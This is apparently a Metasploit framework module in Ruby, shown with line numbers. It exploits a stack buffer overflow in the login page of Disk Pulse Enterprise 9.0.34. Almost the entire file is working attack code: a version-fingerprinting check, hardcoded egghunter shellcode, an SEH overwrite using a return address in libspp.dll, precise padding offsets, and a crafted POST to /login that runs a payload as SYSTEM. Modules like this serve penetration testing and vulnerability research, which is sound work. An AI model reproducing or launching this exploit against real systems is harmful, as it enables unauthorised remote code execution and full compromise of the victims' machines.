1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::Remote::Egghunter
11
  include Msf::Exploit::Remote::Seh
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'Disk Pulse Enterprise Login Buffer Overflow',
18
        'Description' => %q{
19
          This module exploits a stack buffer overflow in Disk Pulse Enterprise
20
          9.0.34. If a malicious user sends a malicious HTTP login request,
21
          it is possible to execute a payload that would run under the Windows
22
          NT AUTHORITY\SYSTEM account. Due to size constraints, this module
23
          uses the Egghunter technique.
24
        },
25
        'License' => MSF_LICENSE,
26
        'Author' => [
27
          'Chris Higgins', # msf Module -- @ch1gg1ns
28
          'Tulpa Security' # Original discovery -- @tulpa_security
29
        ],
30
        'References' => [
31
          [ 'CVE', '2025-34108' ],
32
          [ 'EDB', '40452' ]
33
        ],
34
        'DefaultOptions' => {
35
          'EXITFUNC' => 'thread'
36
        },
37
        'Platform' => 'win',
38
        'Payload' => {
39
          'BadChars' => "\x00\x0a\x0d\x26"
40
        },
41
        'Targets' => [
42
          [
43
            'Disk Pulse Enterprise 9.0.34',
44
            {
45
              'Ret' => 0x10013AAA, # pop ebp # pop ebx # ret 0x04 - libspp.dll
46
              'Offset' => 12600
47
            }
48
          ],
49
        ],
50
        'Privileged' => true,
51
        'DisclosureDate' => '2016-10-03',
52
        'DefaultTarget' => 0,
53
        'Notes' => {
54
          'Reliability' => UNKNOWN_RELIABILITY,
55
          'Stability' => UNKNOWN_STABILITY,
56
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
57
        }
58
      )
59
    )
60

61
    register_options([Opt::RPORT(80)])
62
  end
63

64
  def check
65
    res = send_request_cgi({
66
      'uri' => '/',
67
      'method' => 'GET'
68
    })
69

70
    if res and res.code == 200 and res.body =~ /Disk Pulse Enterprise v9\.0\.34/
71
      return Exploit::CheckCode::Appears
72
    end
73

74
    return Exploit::CheckCode::Safe
75
  end
76

77
  def exploit
78
    connect
79
    eggoptions =
80
      {
81
        :checksum => true,
82
        :eggtag => "w00t"
83
      }
84

85
    print_status("Generating exploit...")
86

87
    sploit = "username=admin"
88
    sploit << "&password=aaaaa\r\n"
89

90
    # Would like to use generate_egghunter(), looking for improvement
91
    egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
92
    egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
93

94
    sploit << rand_text(target['Offset'] - payload.encoded.length)
95
    sploit << "w00tw00t"
96
    sploit << payload.encoded
97
    sploit << make_nops(70)
98
    sploit << rand_text(1614)
99
    # Would like to use generate_seh_record(), looking for improvement
100
    sploit << "\x90\x90\xEB\x0B"
101
    sploit << "\x33\xA3\x01\x10"
102
    sploit << make_nops(20)
103
    sploit << egghunter
104
    sploit << make_nops(7000)
105

106
    # Total exploit size should be 21747
107
    print_status("Total exploit size: " + sploit.length.to_s)
108
    print_status("Triggering the exploit now...")
109
    print_status("Please be patient, the egghunter may take a while...")
110

111
    res = send_request_cgi({
112
      'uri' => '/login',
113
      'method' => 'POST',
114
      'content-type' => 'application/x-www-form-urlencoded',
115
      'content-length' => '17000',
116
      'data' => sploit
117
    })
118

119
    handler
120
    disconnect
121
  end
122
end
123

124